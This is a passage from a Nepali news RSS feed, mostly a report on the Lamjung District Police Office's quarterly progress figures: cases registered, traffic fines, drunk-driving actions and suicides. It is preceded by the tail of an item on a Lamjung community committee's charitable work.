संस्थाले विभिन्न सामजिक गतिविधि सञ्चालन गर्नुका साथै समस्यमा परेका लमजुङवासीहरूलाई आर्थिक, भौतिक र नैतिक सहयोग गर्र्दै आएको छ । यसैगरी, समितिले मर्स्याङदी नाइट लगायतका सांस्कृतिक कार्यक्रम सञ्चालन गरेर आर्थिक संकलन गरेको छ । २०७१ सालमा स्थापित लमजुङमा सम्पर्क समितिले सेवा तथा विकासका कार्य सञ्चालन गर्न अक्षककोषको समेत स्थापना गरेको छ ।
अक्षकोषबाट जिल्लामा शिक्षा तथा खेलकुदको विकासका साथै स्वास्थ्य, विपदका क्षेत्रमा सहयोग गर्दै आएको समितिका नवनिर्वाचित अध्यक्ष श्यमकुमार गुरुङले बताउनुभयो । उहाँका अनुसार समितिको कार्यक्रम ३ वर्ष रहने गरेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=484260जिल्ला प्रहरी कार्यालयद्वारा त्रैमासिक कार्य प्रगति प्रतिवेदन सार्वजनिक
https://www.antaranganews.com/?p=48343
https://www.antaranganews.com/?p=48343#respondThu, 23 Apr 2026 03:13:39 +0000https://www.antaranganews.com/?p=48343बेसीशहर– जिल्ला प्रहरी कार्यालय लमजुङले पछिल्लो त्रैमासिक अवधिको प्रगति प्रतिवेदन सार्वजनिक गरेको छ । आफ्नै कार्यालयमा पत्रकार सम्मेलन गरी सो कार्यालयले गत माघ, फागुन र चैत महिनाको प्रगति बैशाख ९ गते सार्वजनिक गरेको हो । त्यस अवसरमा सर्वाधिक मुद्दा बैंकिङ कसुरका १४ वटा, आत्महत्यका १३ घट्ना भएको जानकारी दिइएको छ ।
जिल्ला प्रहरी कार्यालयका प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेतले पत्रकारहरूलाई स्वागत गर्दै कार्यक्रमको उद्देश्यमा प्रकाश पार्नु भएको थियो । साथै उहाँले एक कार्यपत्र मार्फत त्रैमासिक प्रगतिको विवरण समेत प्रस्तुत गर्दै समग्र कार्य प्रगतिबारे जानकारी दिनु भएको थियो । उहाँले पत्रकारहरूले राखेका जिज्ञासाको सम्बोधन प्रयास समेत गर्नु भएको थियो ।
प्रनाउ बस्नेतले सो अवधिमा गरेका अपराध अनुसन्धान, प्रहरी कार्य, महिला बालबालिका तथा जेष्ठ नागरिक सेवा केन्द्र, उजुरी तथा छानविन कक्ष तर्फका कार्यका साथ समुदाय साझेदारी कायका साथ नवप्रवर्तनिय कार्यहरूका बारेमा पनि जानकारी गराउनु भएको हो । उहाँका अनुसार सो अवधिमा जिल्लामा प्रहरीमार्फत कुल मुद्दा ५८ वटा दर्ता भएको, १५ फर्स्योट भएको, ४ चालु रहेकोछ, ३९ वटा फर्स्योट हुन बाँकी रहेको जानकारी दिनु भयो । ती मुद्दामा प्रतिवादी संख्या ४०, पक्राउ संख्या २० र फरार प्रतिवादी १९ जना रहेको उल्लेख गर्नु भयो ।
त्यस्तै, सो अवधिमा २३ लाख ५३ हजार सवारी साधनको कारबाहीबाट राजस्व संकलन भएको प्रनाउ बस्नेतले जानकारी दिनु भयो । उहाँका अनुसार माघमा आठ लाख पाँच सय, फागुनमा छ लाख ८८ हजार रुपैयाँ र चैत महिनामा आठ लाख ६४ हजार पाँच सय रुपैयाँ राजस्व संकलन भएको हो । सो तीन महिनाको अवधीमा दुईहजार ६ सय ५७ सवारीलाई ट्राफिक नियम उल्लंघन गरेको र ९१ जनालाई मादक पदार्थ सेवन गरी सवारी साधन चलाएको आरोपमा कारवाही गरिएको छ ।
सोही अवधिमा ६० वटा ठाडो उजुरी परेकोमा १५ वटा फर्स्योट भई चारवटा फर्स्योटको प्रक्रियामा रहेको तथा ४५ वटा फर्स्योट हुन बाँकी रहेको उहाँको भनाइ थियो । उहाँका अनुसार ज्यानकेस, सवारी दुर्घटनामा भएको मृत्युको मुद्दा टुंगिनका लागि दुई वर्ष लाग्ने कानुनी प्रावधानका कारणले यस्तो स्थिति उत्पन्न भएको हो । उहाँले भन्नुभयो, ‘प्रतिवादी नखुलेका मुद्दा २२ र खुलेका मुद्दाको संख्या २३ रहेका छन् ।’
यसैगरी प्रहरी साझेदारीतर्फका गतिविधिमा उहाँले प्रकाश पार्नु भएको हो । लमजुङ प्रहरीले विभिन्न मातहतका इकाइबाट अवैध चोरी एवं प्राकृतिक दोहन गरेको भन्दै १० वटा ट्याक्टर, एउटा जेसीबी र एउटा टिप्परलाई पनि कारवाही गरेको छ । सो कारबाहीबाट कुल एकलाख ३० हजार एकसय ५० रुपैया सम्बन्धित स्थानीय तहमा राजश्व संकलन भएको प्रहरीले जनाएको छ ।
सो अवधिमा सबैभन्दा बढी बैंकिङ कसुरका मुद्दा १४ र आत्महत्याका १३ संख्या रहेको प्रनाउ बस्नेतले जानकारी दिनुभयो । तीन महिनाको अवधिमा आत्महत्याका १३ घट्ना हुनुको कारण खोज्ने र निकारणका उपाय अपनाउनेतर्फ स्थानीय र प्रदेश सरकारसँग सहकार्य गर्न जरुरी रहेको पत्रकारहरूले सुझाव दिएका थिए ।
सो कार्यक्रममा प्रहरी निरीक्षकद्वय अभिषेक पाण्डे, ज्ञानेन्द्र क्षेत्री लगायतको विशेष उपस्थिति रहेको थियो । उक्त पत्रकार सम्मेलनको सञ्चालन प्रहरी सहायक निरीक्षक कृष्ण विकले गर्नु भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=483430